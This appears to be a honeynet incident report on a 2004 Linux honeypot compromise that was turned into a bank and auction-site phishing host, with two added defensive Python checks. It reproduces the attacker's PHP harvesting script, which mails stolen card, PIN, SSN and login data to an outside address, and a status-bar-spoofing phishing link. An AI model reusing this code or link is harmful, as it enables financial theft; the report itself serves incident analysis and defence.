On November 12, 2004, the Honeynet was connected to the Internet. Between start-up and November 22, nothing special happened. We just observed an enormous number of packets with destination port 445, which is not critical for the installed Honeypot.
At 1:16 am the Honeypot was compromised through an exploit against the WU-FTP daemon. There was no port scan or FTP connection beforehand; the very first connection was used to hack the computer, which is an indication of an autorooter tool. Such tools scan whole network ranges for vulnerable machines and attack everything they come across. They simply deliver their "evil" payload to every system in the given address range. In our case, it was probably a tool called superwu, since the attacker later used this tool to attack further targets from the Honeypot.
Until 8:21 am there was no activity from the attacker. He probably started the tool the night before and checked in the morning for successfully gained access. As a first step he downloaded a rootkit and installed it on the Honeypot. This script-based rootkit replaces some system binaries with trojaned files:
| /usr/bin/dir | /usr/bin/top | /bin/ps |
| /sbin/ifconfig | /usr/bin/slocate | /usr/bin/pstree |
| /bin/netstat | /usr/bin/vdir | /usr/bin/socklist |
| /usr/bin/strings | /usr/bin/chattr | /usr/sbin/lsof |
In addition, it installs an SSH daemon on port 255, which the attacker subsequently used to log on to the Honeypot. The rootkit uses source code to compile new versions of binary files. These trojaned executables are adjusted to the size of the original files of the target system to "hide" their presence. The rootkit also installs a sniffer to collect login information for other systems. Furthermore, it modifies the init scripts to ensure that the installed services start on the next reboot, and then sends an information mail about the system status to the attacker.
After finishing the installation, the attacker re-entered the Honeypot via the additionally installed SSH service using the tool "putty", an SSH client for Windows systems. Afterwards the attacker downloaded a file called spam.tgz. This archive contains some PHP and HTML files. Further examination showed that these files contain web pages for updating the billing profile of seller accounts at a large Internet auction website. The attacker copied these files into the document root of the webserver. The "index.html" start page is a forwarding page to the auction website, because these PHP pages were incomplete: the attacker edited them but never finished his work on these files. By tracing the IP of the attacker, the source could be located in Romania. A scan of this computer showed no open ports, so this could be the computer of the cracker.
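
Because the rootkit adjusts its trojaned binaries to the size of the originals, a size comparison does not reveal the replacement, while a content hash recorded before the compromise does. The following Python example is added here and is not part of the original report: it baselines the binaries listed in the table above and re-checks them, using a constructed scratch directory in place of a real filesystem (the names `snapshot`, `verify` and `demo` are illustrative).

```python
import hashlib
import os
import tempfile

# Paths taken from the report's table of trojaned binaries.
WATCHED = [
    "/usr/bin/dir", "/usr/bin/top", "/bin/ps", "/sbin/ifconfig",
    "/usr/bin/slocate", "/usr/bin/pstree", "/bin/netstat", "/usr/bin/vdir",
    "/usr/bin/socklist", "/usr/bin/strings", "/usr/bin/chattr", "/usr/sbin/lsof",
]

def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def snapshot(paths, root="/"):
    """Record size and SHA-256 of every watched file found under root."""
    baseline = {}
    for p in paths:
        full = os.path.join(root, p.lstrip("/"))
        if os.path.isfile(full):
            baseline[p] = {"size": os.path.getsize(full), "sha256": sha256_of(full)}
    return baseline

def verify(baseline, root="/"):
    """Return {path: reason} for each file that no longer matches the baseline."""
    findings = {}
    for p, rec in baseline.items():
        full = os.path.join(root, p.lstrip("/"))
        if not os.path.isfile(full):
            findings[p] = "missing"
        elif sha256_of(full) != rec["sha256"]:
            same_size = os.path.getsize(full) == rec["size"]
            findings[p] = ("content changed, size unchanged" if same_size
                           else "content and size changed")
    return findings

def demo():
    """Constructed scenario: one watched file is swapped for same-sized content."""
    with tempfile.TemporaryDirectory() as root:
        for p in WATCHED:
            full = os.path.join(root, p.lstrip("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(b"ORIGINAL-" + p.encode() + b"\x00" * 64)
        baseline = snapshot(WATCHED, root)
        target = os.path.join(root, "bin/ps")
        size = os.path.getsize(target)
        with open(target, "wb") as fh:
            fh.write(b"T" * size)  # different bytes, identical length
        return verify(baseline, root)

if __name__ == "__main__":
    for path, reason in demo().items():
        print(path, "->", reason)
```

On a live system the baseline has to be stored off the host and the check run from trusted media, since the same rootkit also replaces tools such as ps, netstat and lsof that would otherwise be used to inspect the machine.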
At 8:49 am the attacker downloaded another file: psybnc.tgz. After extracting the archive, he installed the included IRC bouncer and started an IRC session to an "undernet.org" server. The channel he entered was probably used to control hacked systems. A scan of all 8 connected clients showed the same atypical open port 255 with a listening SSH daemon, just as on the Honeypot. The attacker also entered another channel and received operator rights there. The topic on this channel was a pointer to his personal homepage and the language used in that channel was Romanian.
At 6:25 pm the attacker came back and downloaded the file windmilk.tgz. This archive contains the "superwu" autorooter. After extracting the executable binary file, he started the exploiter in a screen session with a target network as parameter. Then the attacker detached the session and logged off. Later, when he came back, he reattached the session to see the results. Since the Honeywall blocked all attacks, no systems could be compromised. The attacker did not notice the intervention and at 10:40 pm downloaded and installed a "socksify" proxy, which was configured without any restrictions. With this service anybody could use the Honeypot as a proxy for sending spam or for anonymous connections to any other system. During the honeynet's online time, it was never used.
On November 23, 2004, the attacker came back at 2:25 pm. He added the user "ro" and installed another rootkit. In a side note we present the recording of this session as captured by Snort's binary logging.
At 4:40 pm, the attacker downloaded the archive willson.tgz. This file includes already finished web pages similar to those in the spam.tgz archive. The attacker installed them in the document root directory of the webserver. Now this Honeypot could be used for phishing attacks. Calling the start page brings up a login page that looks like the original login page. While unrelated to the incident we report, a recent example illustrating how closely a phishing data entry form resembles the actual site can be found here.
The input of this form is checked in a rudimentary way with the help of a small PHP script:
For both input fields (username and password), the input must be longer than one character. Note the use of the strings $mesaj and $muie, which suggest a Romanian connection and have been observed in other incidents analysed by members of the UK Honeynet Project. If the input is okay, it is written to the file /tmp/User.doc and the next page is shown. On this page, the victim is tricked into entering personal information. All input is checked, and if any of it does not meet the conditions, an error page is shown. This error page does not attempt to mimic the real error page and most victims would likely become suspicious of the fake web site at this point.
With the help of the following validation script, the data entered into the form is checked. The resulting page of the validation process is not interpreted by the webserver because Apache does not accept .dll files as PHP files by default. The attacker forgot to set the "AddType" directive of the Apache server to interpret .dll files with the PHP engine. The next activity of the attacker was downloading an archive called banksend.tgz. This file includes a PHP script for sending mails:
After downloading the test.txt file, which contained 3719 e-mail addresses, the attacker started sending phishing mails to the recipients listed in this file. The source code of this file shows the real target of the included link:
```html
Please follow the link below and renew your account information. <br><br>
<a href="http://XXX.XXX.XXX.XXX/Checking/login.php"
   onClick="popup('http://www.totalmates.com/php/click.cgi?id=xakir')"
   onMouseOver="window.status='https://internetbanking.bank.com';return true;"
   onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a>
<br> <br>
```
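
The anchor above combines three signals that can be checked mechanically: the href points at a raw IP address, the visible text names a different host, and the mouse-over handlers overwrite the browser status bar. The following Python example is added here and is not part of the original report; it audits the anchors of an HTML mail body, with the redacted address replaced by the documentation address 192.0.2.10 as a constructed stand-in (`audit_links` and the reason labels are illustrative names).

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

def host_of(url):
    """Hostname of url in lower case, or '' if it has none or cannot be parsed."""
    try:
        return urlsplit(url).hostname or ""
    except ValueError:
        return ""

def is_ip(host):
    """True if host is a literal IP address rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

class AnchorAudit(HTMLParser):
    """Collects <a> elements whose markup disagrees with what the reader sees."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._attrs = None  # attributes of the <a> currently open
        self._text = []     # visible text collected inside it

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._attrs, self._text = dict(attrs), []

    def handle_data(self, data):
        if self._attrs is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag != "a" or self._attrs is None:
            return
        attrs, self._attrs = self._attrs, None
        href = attrs.get("href") or ""
        href_host = host_of(href)
        shown = "".join(self._text).strip()
        shown_host = host_of(shown) if "://" in shown else ""
        reasons = []
        if is_ip(href_host):
            reasons.append("href-is-raw-ip")
        if shown_host and shown_host != href_host:
            reasons.append("text-host-differs-from-href")
        # HTMLParser lower-cases attribute names: onMouseOver arrives as onmouseover.
        if any(k.startswith("on") and "window.status" in (v or "")
               for k, v in attrs.items()):
            reasons.append("status-bar-overwritten")
        if reasons:
            self.findings.append({"href": href, "shown": shown, "reasons": reasons})

def audit_links(html):
    parser = AnchorAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed sample: the report's anchor with 192.0.2.10 in place of the
# redacted address, followed by a link whose text and target agree.
SAMPLE = """
<a href="http://192.0.2.10/Checking/login.php"
   onMouseOver="window.status='https://internetbanking.bank.com';return true;"
   onMouseOut="window.status=' ';return true;">https://internetbanking.bank.com</a>
<a href="https://www.example.org/help">https://www.example.org/help</a>
"""

if __name__ == "__main__":
    for f in audit_links(SAMPLE):
        print(f["href"], "shown as", f["shown"], "->", ", ".join(f["reasons"]))
```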
At this point we decided to block outgoing TCP ports 25 and 443 so that no victim would suffer from the phishing attacks. The attacker probably noticed that we blocked outgoing connections and concluded that something weird was happening. He never came back, and on December 8, 2004, the honeynet went offline for further analysis.
What else did we find?
We found archives which contained pre-packaged pages for other major banks. These pages are used for gathering credit card numbers from the victims. For example, in one case the form input will be checked with the help of JavaScript and the only condition is that the input fields are not blank. The next script sends the data to the attacker:
After this validation, the file processing.html shows just the text: "Thank you, Our update team will verify provided information and you will be contacted". In another bank page, we found that the input is not checked for reasonable values. Instead, it is simply sent to the attacker by mail when the "Save" button is used. Furthermore, we found a mailer-script for a US bank which works like the mailer-script. It is a simple PHP script that reads e-mail addresses from a separate file and sends the contents of another file. The recipient file includes 83,073 mail addresses.
This side note shows the commands issued by the phisher from the perspective of the attacker. Their actions were reconstructed with the help of the log files generated by Snort and other logged data. The first part of this side note shows a screenshot of the installation process of the rootkit, with a very "user-friendly" interface allowing easy setup. The second part shows the commands issued by the attacker once the rootkit was installed, which were again reconstructed with the help of Snort log files.
Screenshot of the rootkit installation:
[image:../../images/rootkit_screenshot.png size=full]
Commands issued by the attacker:
In this side note we analyse an example script that is used to validate the information entered by users into an HTML form on a phishing web site. Initially the input data is checked to ensure that the submitted strings are valid. For example, the PIN should be four characters long and the username should not contain certain words. If the entered data passes this check, the script constructs an e-mail message containing the user's information and sends it to an address at a free e-mail provider. Finally, the location bar of the browser is updated to point to the file xxxxISAPI.dll (the file name has been obfuscated). This page will display a confirmation for the victim. In addition, a script was also included that could be used to transfer the phished information to an FTP server.
```php
//Checking for errors in the post:
//1 - CC nr:
if(strlen($ccnumber)<16){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
else if(strlen($ccnumber)>16&&$ccnumber{16}!=' '){
    $error="Invalid credit card number, please re-submit.";
    $errchk=1;
}
//2 - Email syntax:
else if(strstr($email, '@') == FALSE){
    $error="Invalid email address, please re-submit.";
    $errchk=2;
}
//3 - Routing number (if it does exist)
else if(strlen($bankr)>0 && strlen($bankr)<9){
    $error="Invalid bank routing number, please re-submit.";
    $errchk=3;
}
//4 - CVV2 check
else if(strlen($cvv2)!=3&&strlen($cvv2)!=4){
    $error="Invalid card validation code, please re-submit.";
    $errchk=4;
}
//4 - PIN check
else if(strlen($ccp)!=4&&strlen($ccp)!=4){
    $error="Invalid pin number, please re-submit.";
    $errchk=4;
}
//5 fields that should exist:
else if(strlen($username)<1){
    $error="Please enter your full name and re-submit.";
    $errchk=5;
}
else if(strlen($streetaddr)<1){
    $error="Please enter your address and re-submit.";
    $errchk=5;
}
else if(strlen($cityaddr)<1){
    $error="Please enter your city and re-submit.";
    $errchk=5;
}
else if(strlen($mmn)<1){
    $error="Please enter your Mother Maiden Name and re-submit.";
    $errchk=5;
}
else if(strlen($month)<1 || strlen($day)<1 || strlen($year)<1 ){
    $error="Please enter your Date Of Birth and re-submit.";
    $errchk=5;
}
//6 - Bad words check
else if(stristr($badw,$username)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$streetaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$cityaddr)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
else if(stristr($badw,$mmn)){
    $error="ERROR - Invalid user name or password.";
    $errchk=6;
}
//More coming soon:)
//If no error:
if($errchk==0) {
    $efile=fopen("/tmp/User.doc","r");
    fscanf($efile,"%s",$userid);
    fscanf($efile,"%s",$pass);
    fclose($efile);
    $timed = date ("l dS of F Y h:i:s A");
    $ip = $_SERVER["REMOTE_ADDR"];
    $message="----------------------------------------------------------------------------
On $timed the user ($ip) wrote:
CreditCard Number - $ccnumber ; Month - $month ; Day - $day ; Year - $year";
    $message=$message."UserId - $userid";
    $message=$message."Password - $pass";
    $message=$message."Email - $email";
    $message=$message."Email Password - $emailp";
    $message=$message."Full Name - $username";
    $message=$message."Address - $streetaddr";
    $message=$message."City - $cityaddr";
    $message=$message."State - $stateprovaddr";
    $message=$message."Zip Code - $zipcodeaddr";
    $message=$message."Phone number - $phone";
    $message=$message."Country - $countryaddr";
    $message=$message."CVV - $cvv2";
    $message=$message."Bank Name - $bank";
    $message=$message."Bank Routing # - $bankr
Checking Account # - $bankc
Social Security Number - $ssn
Card PIN Number - $ccp
Mother's Maiden Name - $mmn
Date of Birth - $pibirthdatemm $pibirthdatedd $pibirthdateyy
Driver Licence Number - $dln";
    mail ("xxxxxx@hotmail.com","xxEBAYxx","$message","From: tzonfi <xxxxxx@xxxxxx.com>\n");
    header ("Location:xxxxISAPI.dll");
    //$muie = fopen("/tmp/eb.txt", "a");
    //fwrite($muie, $message);
    //fclose($muie);
    //include("cc-ftp.php");
    exit();
}
else {
    echo $error;
}
?>
```
The script cc-ftp.php (commented out in the data processing script above) will transfer the input to an FTP server:
In this side note we provide an overview of the source IP addresses of potential victims in the redirection phishing attack described in phishing technique two. The data below was collected with the help of the compromised German honeypot and modified redir software. Over a period of about 36 hours we observed 721 redirections of inbound HTTP requests to the honeypot, presumably from recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All are potential victims of the phishing attack, but as no personal data was captured we cannot make an educated guess as to how many people actually entered sensitive information into the HTML form on the Chinese phishing web site.